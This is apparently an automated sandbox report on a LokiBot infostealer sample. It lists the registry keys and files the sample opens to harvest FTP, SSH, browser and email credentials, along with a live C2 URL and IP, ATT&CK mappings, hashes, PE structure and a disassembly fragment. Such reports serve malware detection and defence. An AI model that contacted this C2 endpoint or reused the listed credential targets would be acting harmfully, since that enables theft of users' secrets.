              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exe TID: 6268Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeThread delayed: delay time: 60000
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.2535715612.000000000055E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: dw7h7aQwVZ.exe, type: SAMPLE
              Source: Yara matchFile source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\dw7h7aQwVZ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: Yara matchFile source: dw7h7aQwVZ.exe, type: SAMPLE
              Source: Yara matchFile source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000002.2535715612.000000000055E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: dw7h7aQwVZ.exe, type: SAMPLE
              Source: Yara matchFile source: 00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Masquerading
              2
              OS Credential Dumping
              11
              Virtualization/Sandbox Evasion
              Remote Services1
              Email Collection
              2
              Non-Application Layer Protocol
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Virtualization/Sandbox Evasion
              1
              Credentials in Registry
              3
              System Information Discovery
              Remote Desktop Protocol2
              Data from Local System
              12
              Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              dw7h7aQwVZ.exe97%ReversingLabsWin32.Infostealer.LokiBot
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://94.156.177.220/simple/five/fre.phptrue
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                94.156.177.220
                unknownBulgaria
                43561NET1-ASBGtrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1541963
                Start date and time:2024-10-25 11:28:11 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Sample name:dw7h7aQwVZ.exe
                renamed because original name is a hash value
                Original Sample Name:6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@1/1@0/12
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: dw7h7aQwVZ.exe
                Process:C:\Users\user\Desktop\dw7h7aQwVZ.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:unknown
                Preview:1
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.053515766000424
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:dw7h7aQwVZ.exe
                File size:106'496 bytes
                MD5:3fb350f4356f42b51a523b6fa8cbccf3
                SHA1:5f24115b8e734d11deea653df8b32c506c31f4b1
                SHA256:6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
                SHA512:2cfa64f27aa30c8681d7d28ad8a330cb1c830ca6492aa916a4d3177127ee701556c80f234512802dd5c5cc1374c0f47c87ada6587a456c651e3ec3451c0e16af
                SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG
                TLSH:02A32A42B2A5C030F7B74DB2BB73A5B7857E7C332D22C44E9352459A14215E1EB7AB13
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...
                Icon Hash:00928e8e8686b000
                Entrypoint:0x4139de
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:TERMINAL_SERVER_AWARE
                Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:0239fd611af3d0e9b0c46c5837c80e09
                Instruction
                push ebp
                mov ebp, esp
                push ecx
                and dword ptr [ebp-04h], 00000000h
                lea eax, dword ptr [ebp-04h]
                push esi
                push edi
                push eax
                call 00007F118CB48F39h
                push eax
                call 00007F118CB48F16h
                xor esi, esi
                mov edi, eax
                pop ecx
                pop ecx
                cmp dword ptr [ebp-04h], esi
                jle 00007F118CB490F6h
                push 004188BCh
                push dword ptr [edi+esi*4]
                call 00007F118CB3B5C5h
                pop ecx
                pop ecx
                test eax, eax
                je 00007F118CB490DDh
                push 00002710h
                call 00007F118CB3BE7Ah
                pop ecx
                inc esi
                cmp esi, dword ptr [ebp-04h]
                jl 00007F118CB490AEh
                push 00000000h
                call 00007F118CB48F0Eh
                push 00000000h
                call 00007F118CB49222h
                pop ecx
                pop edi
                xor eax, eax
                pop esi
                mov esp, ebp
                pop ebp
                retn 0010h
                push ebp
                mov ebp, esp
                xor eax, eax
                push eax
                push eax
                push E567384Dh
                push eax
                call 00007F118CB38869h
                push dword ptr [ebp+08h]
                call eax
                pop ebp
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, dword ptr [ebp+08h]
                test esi, esi
                je 00007F118CB49134h
                push esi
                call 00007F118CB3B390h
                pop ecx
                test eax, eax
                je 00007F118CB49129h
                push esi
                call 00007F118CB393CCh
                pop ecx
                test eax, eax
                je 00007F118CB4911Eh
                mov eax, dword ptr [0049FDECh]
                cmp dword ptr [ebp+10h], 00000000h
                cmovne eax, dword ptr [ebp+10h]
                push eax
                push dword ptr [0049FDE8h]
                call 00007F118CB3ADC4h
                push dword ptr [ebp+0Ch]
                push dword ptr [0049FDE8h]
                call 00007F118CB3ADB6h
                push 00000000h
                push 00000000h
                push esi
                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [ASM] VS2003 (.NET) build 3077
                • [ASM] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2013 UPD5 build 40629
                • [LNK] VS2013 UPD5 build 40629
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x150000x5c.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x136f50x1380094fa411af1cc6bb168a3ea0e66e80f78False0.5685096153846154data6.49204829439013IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x150000x40600x420015686b489e8ad18c33f8b12a6e57b4eeFalse0.3659446022727273data4.255999483050136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x1a0000x85e240x200955b3a57edf41d6c47c7225e8d847f91False0.056640625OpenPGP Public Key0.32171607431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .x0xa00000x20000x20000c3dcd4efb800d2a9617b89e313aa361False0.0181884765625data0.19795807498627813IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLLImport
                WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                OLEAUT32.dllVariantInit, SysFreeString, SysAllocString